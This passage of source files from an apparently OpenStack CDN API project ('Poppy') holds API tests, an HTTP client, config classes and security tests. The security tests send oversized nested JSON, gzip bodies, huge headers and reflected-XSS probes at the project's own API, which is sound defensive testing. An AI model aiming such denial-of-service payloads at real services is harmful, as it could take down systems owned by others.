raise errors.InvalidOperation(msg)
```
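A short illustration of how a schema subclass is consumed, assuming the poppy package is importable; the resource and operation names below are invented for the example.

```python
from poppy.transport.validators import schema_base


class ExampleSchema(schema_base.SchemaBase):
    schema = {
        'service': {
            'POST': {'type': 'object',
                     'properties': {'name': {'type': 'string'}}},
        },
    }


print(ExampleSchema.get_schema('service', 'POST'))
# An unknown resource or operation raises InvalidResourceName /
# InvalidOperation from poppy.common.errors.
```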
#### File: api/assets/test_assets.py
```python
import uuid
import ddt
from nose.plugins import attrib
from tests.api import base
@ddt.ddt
class TestAssets(base.TestBase):
"""Tests for Assets."""
def _create_test_service(self):
service_name = str(uuid.uuid1())
self.domain_list = [{"domain": str(uuid.uuid1()) + '.com'}]
self.origin_list = [{"origin": str(uuid.uuid1()) + '.com',
"port": 443, "ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home", "ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.client.create_service(service_name=service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
return service_name
def setUp(self):
super(TestAssets, self).setUp()
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
self.service_name = self._create_test_service()
@attrib.attr('smoke')
@ddt.data('True', 'true', 'TRUE', 'TRue')
def test_purge_assets_all(self, purge_all):
url_param = {'all': purge_all}
resp = self.client.purge_assets(service_name=self.service_name,
param=url_param)
self.assertEqual(resp.status_code, 202)
@attrib.attr('smoke')
    @ddt.data('mywebsite.com', 'images/maakri.jpg')
def test_purge_assets_url(self, url):
url_param = {'url': url}
resp = self.client.purge_assets(service_name=self.service_name,
param=url_param)
self.assertEqual(resp.status_code, 202)
@attrib.attr('smoke')
def test_purge_assets_negative(self):
url_param = {'url': 'myurl.com', 'all': True}
resp = self.client.purge_assets(service_name=self.service_name,
param=url_param)
self.assertEqual(resp.status_code, 400)
def tearDown(self):
self.client.delete_service(service_name=self.service_name)
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestAssets, self).tearDown()
```
#### File: api/utils/client.py
```python
import json
import time
from cafe.engine.http import client
from tests.api.utils.models import requests
class AuthClient(client.HTTPClient):
"""Client Objects for Auth call."""
def __init__(self):
super(AuthClient, self).__init__()
self.default_headers['Content-Type'] = 'application/json'
self.default_headers['Accept'] = 'application/json'
def authenticate_user(self, auth_url, user_name, api_key):
"""Get Auth Token & Project ID using api_key
TODO (malini-kamalambal): Support getting token with password (or)
api key.
"""
request_body = {
"auth": {
"RAX-KSKEY:apiKeyCredentials": {
"username": user_name,
"apiKey": api_key
},
},
}
request_body = json.dumps(request_body)
url = auth_url + '/tokens'
response = self.request('POST', url, data=request_body)
token = response.json()['access']['token']['id']
project_id = response.json()['access']['token']['tenant']['id']
return token, project_id
class PoppyClient(client.AutoMarshallingHTTPClient):
"""Client objects for all the Poppy api calls."""
def __init__(self, url, auth_token, project_id, serialize_format="json",
deserialize_format="json"):
super(PoppyClient, self).__init__(serialize_format,
deserialize_format)
self.url = url
self.auth_token = auth_token
self.project_id = project_id
self.default_headers['X-Auth-Token'] = auth_token
self.default_headers['X-Project-Id'] = project_id
self.default_headers['Content-Type'] = 'application/json'
self.serialize = serialize_format
self.deserialize_format = deserialize_format
def create_service(self, service_name=None,
domain_list=None, origin_list=None,
caching_list=None, restrictions_list=None,
requestslib_kwargs=None,
flavor_id=None):
"""Creates Service
:return: Response Object containing response code 200 and body with
details of service
        POST
        services
"""
url = '{0}/services'.format(self.url)
request_object = requests.CreateService(
service_name=service_name,
domain_list=domain_list,
origin_list=origin_list,
caching_list=caching_list,
restrictions_list=restrictions_list,
flavor_id=flavor_id)
return self.request('POST', url, request_entity=request_object,
requestslib_kwargs=requestslib_kwargs)
def patch_service(self, location, request_body=None,
requestslib_kwargs=None):
"""Updates Service
:return: Response code 202 with location header
PATCH
services/{service_name}
"""
request_object = requests.PatchService(request_body=request_body)
return self.request('PATCH', location, request_entity=request_object,
requestslib_kwargs=requestslib_kwargs)
def get_service(self, location=None, requestslib_kwargs=None):
"""Get Service
:return: Response Object containing response code 200 and body with
details of service
GET
services/{service_id}
"""
return self.request('GET', location,
requestslib_kwargs=requestslib_kwargs)
def list_services(self, param=None, requestslib_kwargs=None):
"""Get a list of Services
:return: Response Object containing response code 200 and body with
list of services & details
GET
services
"""
url = '{0}/services'.format(self.url)
return self.request('GET', url, params=param,
requestslib_kwargs=requestslib_kwargs)
def delete_service(self, location, requestslib_kwargs=None):
"""Delete Service
:return: Response Object containing response code 204
DELETE
services/{service_id}
"""
return self.request('DELETE', location,
requestslib_kwargs=requestslib_kwargs)
def check_health(self):
"""Check Health of the application
:return: Response Object containing response code 204
GET
health
"""
url = '{0}/health'.format(self.url)
return self.request('GET', url)
def ping(self):
"""Ping the server
:return: Response Object containing response code 204
GET
ping
"""
url = '{0}/ping'.format(self.url)
return self.request('GET', url)
def create_flavor(self, flavor_id=None, provider_list=None, limits=None,
requestslib_kwargs=None):
"""Create flavor
:return: Response Object containing response code 204 and header with
Location
        POST
        flavors
"""
url = '{0}/flavors'.format(self.url)
request_object = requests.CreateFlavor(
flavor_id=flavor_id,
provider_list=provider_list,
limits=limits)
return self.request('POST', url,
request_entity=request_object,
requestslib_kwargs=requestslib_kwargs)
def get_flavor(self, flavor_location=None, flavor_id=None):
"""Get Flavor
:return: Response Object containing response code 200 and body with
details of flavor
GET
flavors/{flavor_id}
"""
if flavor_location:
url = flavor_location
else:
url = '{0}/flavors/{1}'.format(self.url, flavor_id)
return self.request('GET', url)
def delete_flavor(self, flavor_location=None, flavor_id=None):
"""Delete Flavor
:return: Response Object containing response code 204
DELETE
flavors/{flavor_id}
"""
if flavor_location:
url = flavor_location
else:
url = u'{0}/flavors/{1}'.format(self.url, flavor_id)
return self.request('DELETE', url)
def wait_for_service_status(self, location, status, retry_interval=2,
retry_timeout=30):
"""Waits for a service to reach a given status."""
current_status = ''
start_time = int(time.time())
stop_time = start_time + retry_timeout
while current_status != status:
time.sleep(retry_interval)
service = self.get_service(location=location)
body = service.json()
current_status = body['status']
if (current_status == status):
return
current_time = int(time.time())
if current_time > stop_time:
return
```
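A hedged end-to-end sketch of how these clients fit together; the endpoint URLs, username, and API key are placeholders, and the `standard` flavor id is assumed to exist.

```python
from tests.api.utils import client

auth = client.AuthClient()
token, project_id = auth.authenticate_user(
    'https://identity.example.com/v2.0', 'my_user', 'my_api_key')

poppy = client.PoppyClient('https://poppy.example.com/v1.0',
                           token, project_id)
resp = poppy.create_service(
    service_name='demo-service',
    domain_list=[{'domain': 'www.example.com'}],
    origin_list=[{'origin': 'example.com', 'port': 80, 'ssl': False}],
    caching_list=[{'name': 'default', 'ttl': 3600}],
    flavor_id='standard')
print(resp.status_code)
if 'location' in resp.headers:
    poppy.wait_for_service_status(resp.headers['location'], 'DEPLOYED')
```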
#### File: api/utils/config.py
```python
import json
from cafe.engine.models import data_interfaces
class PoppyConfig(data_interfaces.ConfigSectionInterface):
"""Defines the config values for poppy."""
SECTION_NAME = 'poppy'
@property
def base_url(self):
"""poppy endpoint."""
return self.get('base_url')
@property
def flavor(self):
"""poppy flavor definitions."""
return json.loads(self.get('flavor'))
class TestConfig(data_interfaces.ConfigSectionInterface):
"""Defines the config values specific to test execution."""
SECTION_NAME = 'test_configuration'
@property
def provider_validation(self):
"""Boolean value indicating if tests verify provider side details."""
return self.get_boolean('provider_validation')
@property
def status_check_retry_interval(self):
"""Int value to set retry intervals for status check."""
return int(self.get('status_check_retry_interval'))
@property
def status_check_retry_timeout(self):
"""Int value to set timeout for status check."""
return int(self.get('status_check_retry_timeout'))
@property
def generate_flavors(self):
"""Boolean value to create unique flavors in tests."""
return self.get_boolean('generate_flavors')
@property
def default_flavor(self):
"""String value to set the default flavor to use in tests."""
return self.get('default_flavor')
@property
def project_id_in_url(self):
"""Flag to indicate if project_id should be present in the url."""
return self.get_boolean('project_id_in_url')
class AuthConfig(data_interfaces.ConfigSectionInterface):
"""Defines the auth config values."""
SECTION_NAME = 'auth'
@property
def auth_enabled(self):
"""Auth On/Off."""
return self.get_boolean('auth_enabled')
@property
def base_url(self):
"""Auth endpoint."""
return self.get('base_url')
@property
def user_name(self):
"""The name of the user, if applicable."""
return self.get('user_name')
@property
def api_key(self):
"""The user's api key, if applicable."""
return self.get_raw('api_key')
@property
def multi_user(self):
"""Flag to indicate if the tests need multiple accounts."""
return self.get_boolean('multi_user')
@property
def alt_user_name(self):
"""The name of the alternate user, if applicable."""
return self.get('alt_user_name')
@property
def alt_api_key(self):
"""The alternate user's api key, if applicable."""
return self.get_raw('alt_api_key')
class FastlyConfig(data_interfaces.ConfigSectionInterface):
"""Defines the fastly config values."""
SECTION_NAME = 'fastly'
@property
def api_key(self):
"""Fastly API Key."""
return self.get('api_key')
@property
def email(self):
"""Email id associated with Fastly account."""
return self.get('email')
@property
def password(self):
"""Fastly password."""
return self.get('password')
```
#### File: tests/endtoend/base.py
```python
import BeautifulSoup
from cafe.drivers.unittest import fixtures
import requests
from tests.api.utils import client
from tests.endtoend.utils import config
from tests.endtoend.utils import heatclient
from tests.endtoend.utils import wptclient
class TestBase(fixtures.BaseTestFixture):
"""Base class for End To End CDN Tests
    The tests do the following:
    1. Spin up a wordpress site on a cloud server.
    2. Create a Poppy service via an API call using the origin & domain
       from Step 1.
    3. Measure the pageload performance of the CDN-enabled website.
"""
@classmethod
def setUpClass(cls):
super(TestBase, cls).setUpClass()
cls.auth_config = config.AuthConfig()
cls.auth_client = client.AuthClient()
auth_token, project_id = cls.auth_client.authenticate_user(
cls.auth_config.base_url,
cls.auth_config.user_name,
cls.auth_config.api_key)
cls.poppy_config = config.PoppyConfig()
cls.url = cls.poppy_config.base_url
cls.poppy_client = client.PoppyClient(
cls.url, auth_token, project_id,
serialize_format='json',
deserialize_format='json')
cls.test_config = config.TestConfig()
cls.heat_config = config.OrchestrationConfig()
heat_url = cls.heat_config.base_url + '/' + project_id
cls.heat_client = heatclient.HeatClient(heat_url=heat_url,
token=auth_token)
cls.wpt_config = config.WebPageTestConfig()
cls.wpt_client = wptclient.WebpageTestClient(
wpt_url=cls.wpt_config.base_url, api_key=cls.wpt_config.api_key)
def get_content(self, url):
"""Get content from the url
:param url: url to get content from
:returns: content fetched from the url
"""
response = requests.get(url)
content = BeautifulSoup.BeautifulSoup(response.text)
return content.findAll()
def assertSameContent(self, origin_url, access_url):
"""Asserts that the origin & access_url serve the same content
        :param origin_url: Origin website
:param access_url: CDN enabled url of the origin website
        :returns: None; fails the test if the content differs
"""
origin_content = self.get_content(url=origin_url)
cdn_content = self.get_content(url=access_url)
self.assertEqual(origin_content, cdn_content)
@classmethod
def tearDownClass(cls):
"""Deletes the added resources."""
super(TestBase, cls).tearDownClass()
```
#### File: tests/endtoend/test_cdn_website.py
```python
import random
import string
import uuid
from tests.endtoend import base
class TestWebsiteCDN(base.TestBase):
"""Tests for CDN enabling a website."""
def setUp(self):
super(TestWebsiteCDN, self).setUp()
def _random_string(length=12):
return ''.join([random.choice(string.ascii_letters)
for _ in range(length)])
self.stack_name = _random_string()
self.domain_name = 'TestCDN-' + _random_string() + '.org'
# Deploys a test website to a cloud server
self.heat_client.create_stack(yaml_path=self.heat_config.yaml_path,
stack_name=self.stack_name,
domain_name=self.domain_name)
print('Stack Name', self.stack_name)
print('Domain Name', self.domain_name)
self.heat_client.wait_for_stack_status(stack_name=self.stack_name)
self.origin = self.heat_client.get_server_ip(
stack_name=self.stack_name)
print('Origin', self.origin)
def test_enable_cdn(self):
# Create a Poppy Service for the test website
domain_list = [{"domain": self.domain_name}]
origin_list = [{"origin": self.origin,
"port": 80,
"ssl": False}]
caching_list = []
self.service_name = str(uuid.uuid1())
resp = self.poppy_client.create_service(
service_name=self.service_name,
domain_list=domain_list,
origin_list=origin_list,
caching_list=caching_list,
flavor_id=self.poppy_config.flavor)
self.assertEqual(resp.status_code, 202)
self.poppy_client.wait_for_service_status(
service_name=self.service_name,
status='DEPLOYED')
resp = self.poppy_client.get_service(service_name=self.service_name)
links = resp.json()['links']
access_url = [link['href'] for link in links if
link['rel'] == 'access_url']
access_url = 'http://' + access_url[0]
origin_url = 'http://' + self.origin
self.assertSameContent(origin_url=origin_url, access_url=access_url)
# Benchmark page load metrics for the CDN enabled website
wpt_test_results = {}
for location in self.wpt_config.test_locations:
wpt_test_url = self.wpt_client.start_test(access_url=access_url,
test_location=location,
runs=2)
wpt_test_results[location] = wpt_test_url
'''self.wpt_client.wait_for_test_status(status='COMPLETE',
test_url=wpt_test_url)
wpt_test_results[location] = self.wpt_client.get_test_details(
test_url=wpt_test_url)
'''
print(wpt_test_results)
def tearDown(self):
self.heat_client.delete_stack(stack_name=self.stack_name)
self.poppy_client.delete_service(service_name=self.service_name)
super(TestWebsiteCDN, self).tearDown()
```
#### File: security/flavors/test_dos_flavors.py
```python
import uuid
import ddt
import gzip
import StringIO
from nose.plugins import attrib
from tests.api import providers
@ddt.ddt
class TestDOSCreateFlavor(providers.TestProviderBase):
"""Security Tests for Denial of Service vulnerablities
for creating Flavor."""
def setUp(self):
"""
Setup for the tests
"""
super(TestDOSCreateFlavor, self).setUp()
self.reset_defaults()
self.MAX_ATTEMPTS = 30
def reset_defaults(self):
"""
Reset provider_list, limit_list
and flavor_id to its default values.
"""
self.provider_list = [{"provider": "fastly",
"links": [{"href": "www.watermelon.com",
"rel": "provider_url"}]}]
self.limits_list = [{"origins": {"min": 1, "max": 5}},
{"domains": {"min": 1, "max": 5}},
{"caching": {"min": 3600,
"max": 604800, "incr": 300}}]
self.flavor_id = str(uuid.uuid1())
def create_invalid_json(self, length):
"""
Create invalid_json like [[[[[[[[[[[[[test]]]]]]]]]]]]]
"""
str = ""
str += "[" * length
str += "\"test\""
str += "]" * length
return str
def create_malicious_json(self, length):
"""
Create malicious json like {{{{t:{{{{{}}}}}}}}}
"""
str = "{"
for k in range(0, length):
str += "\"t%s\":{" % k
str += "\"t\":\"t\""
for k in range(0, length):
str += "}"
str += "}"
return str
def data_zip(self, data):
"""
zip the data using gzip format
"""
stringio = StringIO.StringIO()
gzip_file = gzip.GzipFile(fileobj=stringio, mode='wb')
gzip_file.write(data)
gzip_file.close()
return stringio.getvalue()
def check_one_request(self):
"""
Check the response of one request to see whether request can
kill the application.
"""
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list)
        self.assertTrue(resp.status_code < 503)
        # delete the flavor
self.client.delete_flavor(flavor_id=self.flavor_id)
@attrib.attr('security')
def test_invalid_json_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big invalid json blob.
"""
# create a payload with invalid json blob
attack_string = self.create_invalid_json(2500)
kwargs = {"data": attack_string}
        print(kwargs)
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob.
"""
        # create a payload with malicious json blob
attack_string = self.create_malicious_json(900)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_8_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-8 encoding.
"""
# create a payload with malicious json blob
attack_string = self.create_malicious_json(800)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string.encode("utf-8")}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_create_flavor_with_big_project_id(self):
"""
Check whether it is possible to kill the application by
        creating a flavor with a big X-Project-Id header.
"""
failed_count = 0
for k in range(2500, 8000, 500):
self.reset_defaults()
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": "1"*k,
"Content-Type": "application/json"}
kwargs = {"headers": headers}
self.flavor_id = str(uuid.uuid1())
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
#self.assertTrue(resp.status_code < 503)
if (resp.status_code == 503):
failed_count += 1
resp = self.client.list_services(requestslib_kwargs=kwargs)
if (resp.status_code == 503):
failed_count += 1
self.assertTrue(failed_count <= 3)
#self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_16_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-16 encoding.
"""
        # create a payload with malicious json blob
attack_string = self.create_malicious_json(400)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string.encode("utf-16")}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_gzip_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with gzip.
"""
        # create a payload with malicious json blob
attack_string = self.create_malicious_json(2500)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id,
"Content-Encoding": "gzip"}
kwargs = {"headers": headers, "data": self.data_zip(attack_string)}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_dos_create_flavor_provider_list(self):
"""
Check whether it is possible to kill the application by
creating a flavor with huge list of providers.
"""
        # create a huge list of providers
self.reset_defaults()
for k in range(1, 30000):
self.provider_list.append({"provider": "%s" % k,
"links": [{"href": "www.watermelon.com",
"rel": "provider_url"}]})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.flavor_id = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_flavor_provider_list_links(self):
"""
Check whether it is possible to kill the application by
        creating a flavor with a huge list of links within the provider list.
"""
# create a huge list of links
self.reset_defaults()
for k in range(1, 15000):
self.provider_list[0]["links"].append(
{"href": "i%s" % k,
"rel": "/index.htm"})
        # send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.flavor_id = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_create_flavor_limits_list(self):
"""
Check whether it is possible to kill the application by
        creating a flavor with a huge list of limits.
"""
        # create a huge list of limits
self.reset_defaults()
self.limits_list.append({"domains": {"min": 1, "max": 5}})
self.limits_list.append({"caching": {"min": 3600,
"max": 604800, "incr": 300}})
for k in range(1, 9000):
self.limits_list.append({"origins": {"min": "%s" % k, "max": 5}})
# send MAX_ATTEMPTS requests
for k in range(1, self.MAX_ATTEMPTS):
self.flavor_id = str(uuid.uuid1())
self.check_one_request()
@attrib.attr('security')
def test_dos_list_flavors_huge_junk(self):
"""
Check whether it is possible to kill the application by
listing all flavors with a huge junk parameter
"""
# create a huge list of junk
attack_string = "1" * 3500
params = {"junk": attack_string}
resp = self.client.list_flavors(param=params)
self.assertTrue(resp.status_code < 503)
def tearDown(self):
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestDOSCreateFlavor, self).tearDown()
```
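The payload helpers above (deeply nested JSON and gzip-compressed bodies) can be exercised on their own; here is a standalone, runnable sketch that mirrors them without touching any API, using the same Python 2 `StringIO` idiom as the tests.

```python
import gzip
import json
import StringIO


def nested_json(depth):
    """Build {"t0": {"t1": {... {"t": "t"} ...}}} with `depth` levels."""
    payload = '{'
    for k in range(depth):
        payload += '"t%s":{' % k
    payload += '"t":"t"' + '}' * depth + '}'
    return payload


def gzip_body(data):
    """Compress a request body the way the gzip DoS tests do."""
    buf = StringIO.StringIO()
    gz = gzip.GzipFile(fileobj=buf, mode='wb')
    gz.write(data)
    gz.close()
    return buf.getvalue()


body = nested_json(5)
json.loads(body)                    # valid JSON, just deeply nested
print('%d -> %d bytes' % (len(body), len(gzip_body(body))))
```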
#### File: security/flavors/test_xss_flavors.py
```python
import uuid
import re
from re import search
import ddt
from nose.plugins import attrib
#from tests.api import base
from tests.api import providers
#from tests.api.utils.schema import services
VULNERABLE_MESSAGE = "Reflected XSS found"
@ddt.ddt
class TestXSSCreateFlavor(providers.TestProviderBase):
"""Security Tests for Fuzzing Create Service."""
def setUp(self):
super(TestXSSCreateFlavor, self).setUp()
self.reset_defaults()
def reset_defaults(self):
"""
Reset provider_list, limits
and flavor_id to its default value.
"""
self.provider_list = [{"provider": "fastly",
"links": [{"href": "www.watermelon.com",
"rel": "provider_url"}]}]
self.limits_list = [{"origins": {"min": 1, "max": 5}},
{"domains": {"min": 1, "max": 5}},
{"caching": {"min": 3600,
"max": 604800, "incr": 300}}]
self.flavor_id = str(uuid.uuid1())
def check(self, resp, xss_string):
matched_xss_string = search(re.escape(xss_string), resp.content, re.I)
        if matched_xss_string is not None:
            self.fail(VULNERABLE_MESSAGE)
def check_one_request(self, xss_string):
"""
Check the response of one request
"""
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list)
self.check(resp, xss_string)
self.client.delete_flavor(flavor_id=self.flavor_id)
@attrib.attr('security')
@ddt.file_data('../services/data_xss.json')
def test_xss_flavor_id(self, test_data):
self.flavor_id = test_data['xss_string']
self.check_one_request(self.flavor_id)
self.reset_defaults()
@attrib.attr('security')
@ddt.file_data('../services/data_xss.json')
def test_xss_provider(self, test_data):
test_string = test_data['xss_string']
for key in self.provider_list[0]:
self.flavor_id = str(uuid.uuid1())
            # TODO: this is currently tied to the existing example data.
if isinstance(self.provider_list[0][key], (list)):
for the_key in self.provider_list[0][key][0]:
self.provider_list[0][key][0][the_key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
else:
self.provider_list[0][key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
@attrib.attr('security')
@ddt.file_data('../services/data_xss.json')
def test_xss_limits(self, test_data):
test_string = test_data['xss_string']
for i in range(len(self.limits_list)):
for key in self.limits_list[i]:
self.flavor_id = str(uuid.uuid1())
                # TODO: this is currently tied to the existing example data.
if isinstance(self.limits_list[i][key], (dict)):
for the_key in self.limits_list[i][key]:
self.limits_list[i][key][the_key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
else:
self.limits_list[i][key] = test_string
self.check_one_request(test_string)
self.reset_defaults()
def tearDown(self):
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestXSSCreateFlavor, self).tearDown()
```
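The reflected-XSS check above boils down to scanning the response body for the exact payload. Here is a tiny runnable sketch of that check, with an illustrative payload string:

```python
import re
from re import search


def is_reflected(xss_string, response_body):
    """True if the payload appears verbatim (case-insensitively) in the body."""
    return search(re.escape(xss_string), response_body, re.I) is not None


payload = '<script>alert(1)</script>'
print(is_reflected(payload, 'Error: %s is not a valid flavor id' % payload))  # True
print(is_reflected(payload, 'Error: invalid flavor id'))                      # False
```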
#### File: security/services/test_dos_services.py
```python
import uuid
import ddt
import gzip
import StringIO
from nose.plugins import attrib
from tests.api import providers
@ddt.ddt
class TestDOSCreateService(providers.TestProviderBase):
"""Security Tests for Denail of Service vulnerablities
for creating Service."""
def setUp(self):
"""
Setup for the tests
"""
super(TestDOSCreateService, self).setUp()
self.domain_list = [{"domain": "mywebsite%s.com" % uuid.uuid1()}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.restrictions_list = [
{
u"name": u"website only",
u"rules": [
{
u"name": "mywebsite.com",
u"referrer": "mywebsite.com"
}
]
}
]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
self.MAX_ATTEMPTS = 30
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
def reset_defaults(self):
"""
Reset domain_list, origin_list, caching_list, service_name
and flavor_id to its default value.
"""
self.domain_list = [{"domain": "mywebsite%s.com" % uuid.uuid1()}]
self.origin_list = [{"origin": "mywebsite1.com",
"port": 443,
"ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home",
"ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
def create_invalid_json(self, length):
"""
Create invalid_json like [[[[[[[[[[[[[test]]]]]]]]]]]]]
"""
str = ""
str += "[" * length
str += "\"test\""
str += "]" * length
return str
def create_malicious_json(self, length):
"""
Create malicious json like {{{{t:{{{{{}}}}}}}}}
"""
str = "{"
for k in range(0, length):
str += "\"t%s\":{" % k
str += "\"t\":\"t\""
for k in range(0, length):
str += "}"
str += "}"
return str
def data_zip(self, data):
"""
zip the data using gzip format
"""
stringio = StringIO.StringIO()
gzip_file = gzip.GzipFile(fileobj=stringio, mode='wb')
gzip_file.write(data)
gzip_file.close()
return stringio.getvalue()
def check_one_request(self):
"""
Check the response of one request to see whether one request can
kill the application.
"""
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
        self.assertTrue(resp.status_code < 503)
        # delete the service
if self.service_url != '':
self.client.delete_service(location=self.service_url)
@attrib.attr('security')
def test_invalid_json_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big invalid json blob.
"""
# create a payload with invalid json blob
attack_string = self.create_invalid_json(2500)
kwargs = {"data": attack_string}
        print(kwargs)
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob.
"""
        # create a payload with malicious json blob
attack_string = self.create_malicious_json(900)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_8_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-8 encoding.
"""
        # create a payload with malicious json blob
attack_string = self.create_malicious_json(800)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string.encode("utf-8")}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_create_service_with_big_project_id(self):
"""
Check whether it is possible to kill the application by
        creating a service with a big X-Project-Id header.
"""
failed_count = 0
for k in range(2500, 8000, 500):
self.reset_defaults()
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": "1"*k,
"Content-Type": "application/json"}
kwargs = {"headers": headers}
self.service_name = str(uuid.uuid1())
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
#self.assertTrue(resp.status_code < 503)
if (resp.status_code == 503):
failed_count += 1
resp = self.client.list_services(requestslib_kwargs=kwargs)
if (resp.status_code == 503):
failed_count += 1
self.assertTrue(failed_count <= 3)
#self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_16_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-16 encoding.
"""
        # create a payload with malicious json blob
attack_string = self.create_malicious_json(400)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string.encode("utf-16")}
resp = self.client.create_service(service_name=self.service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id,
requestslib_kwargs=kwargs)
if 'location' in resp.headers:
self.service_url = resp.headers['location']
else:
self.service_url = ''
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_gzip_create_service(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with gzip.
"""
# create a payload with malicious json blob
attack_string = self.create_malicious_json(2500)
